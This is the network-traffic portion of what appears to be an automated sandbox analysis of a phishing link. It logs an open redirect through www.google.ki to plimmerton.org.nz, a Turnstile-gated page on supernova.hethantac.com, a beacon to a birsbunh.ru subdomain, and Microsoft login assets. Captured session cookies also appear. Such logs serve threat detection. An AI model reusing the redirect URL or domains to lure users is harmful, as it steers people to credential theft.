Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:55131 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:55190 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.16:60711 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:55117 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:52936 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.ki to http://plimmerton.org.nz/jugz/
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global trafficHTTP traffic detected: GET /url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F HTTP/1.1Host: www.google.kiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/plimmerton.org.nz/jugz/ HTTP/1.1Host: www.google.kiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=sQjifQE7owb0s5b-aGwU8s_OkAMsqqo_hZa2uXgG60dATIdNhcNaMEhF20iVM16Xi6GHBZmCKO5LQJqQRHVo8oARJtrG2JbPfSplJ8RvOaR3pust3CXD8cI-lbj_HmIDwrNDsKWGjT0H_HNaJloUX16tY2My0gEJbChlc1QW6yKLDDMYKNNWs9WfdupvQPfhEo6J
Source: global trafficHTTP traffic detected: GET /3XdZQxT/ HTTP/1.1Host: supernova.hethantac.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://plimmerton.org.nz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://supernova.hethantac.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://supernova.hethantac.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://supernova.hethantac.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://supernova.hethantac.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://supernova.hethantac.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e45aa726acf4857&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: supernova.hethantac.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://supernova.hethantac.com/3XdZQxT/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InRDVEZMSUZOSzE0SEtNOURweW9vSXc9PSIsInZhbHVlIjoiaUVNTlpLbVRzNXFtdnk5UU5KbmhwaGhlVVR2VTI0OEF1V2NoTyt6YmlVajhFZzlkSVlKOHEzUTNic1BtWnJHWk9zdlJyME92bm5wMUsyM3BZMmtlMnJLcVgyQUc2OUZZN1plSm1WdkRpdjRkREdXVkVnZ0lKNFFSREFJeU5wd0kiLCJtYWMiOiJkODdjYWQxZTA3YmE5Mjk2YzU4ZDEwOTViZTdkZmFiNDRjMTMyMWFmYWZkZWFjOTRlMzRmNWMxNWQ2MGRiZGY3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpHNzVIUzUrSFNrYWNJTHpqaUJUZGc9PSIsInZhbHVlIjoiZjdLQ3pCOTgzd3J0SE5nRWYyb1R0KzI3cm1nczdnaEhGWnBYcVpGcEEwdHFnYS9lcUlaUnJsejdDWmhtb0ZCSDRiN2VjbnBxaWJscDZtOExPOTJBOXZEMXNqOWdyT2pPbnBhUE1lYmM0MTM4Y2QxU080Q1BqbnZ6Z29wS2Q3Q3YiLCJtYWMiOiI3OTA1NzcyYzEyZTQ2NTE0ZmM4NDZjYTA0ZGI3MmYzNjQ3MWY2NjA2NWIwNzUxZTYyNTlmYTFmNGU5NjViMjcxIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dwUofH8SZLFcSGV&MD=BxftRVnd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e45aa726acf4857&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8e45aa726acf4857/1731908848539/e71f142feaf079649ccaf46b60025186ccfc7d9bc8d0652e628e1a0fa374fd37/GHRH_yeYijJgzEt HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e45aa726acf4857/1731908848543/5Iv_qXWII0BR-3- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e45aa726acf4857/1731908848543/5Iv_qXWII0BR-3- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yhLPPHQxZfXkDAHXPFtWbCaEGFqyqLULWDEHCYEELIQZRNENRPHOMHUBA HTTP/1.1Host: jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://supernova.hethantac.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://supernova.hethantac.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yhLPPHQxZfXkDAHXPFtWbCaEGFqyqLULWDEHCYEELIQZRNENRPHOMHUBA HTTP/1.1Host: jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_IzDt-l0Cuie0gYRUoEk15w2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_IzDt-l0Cuie0gYRUoEk15w2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
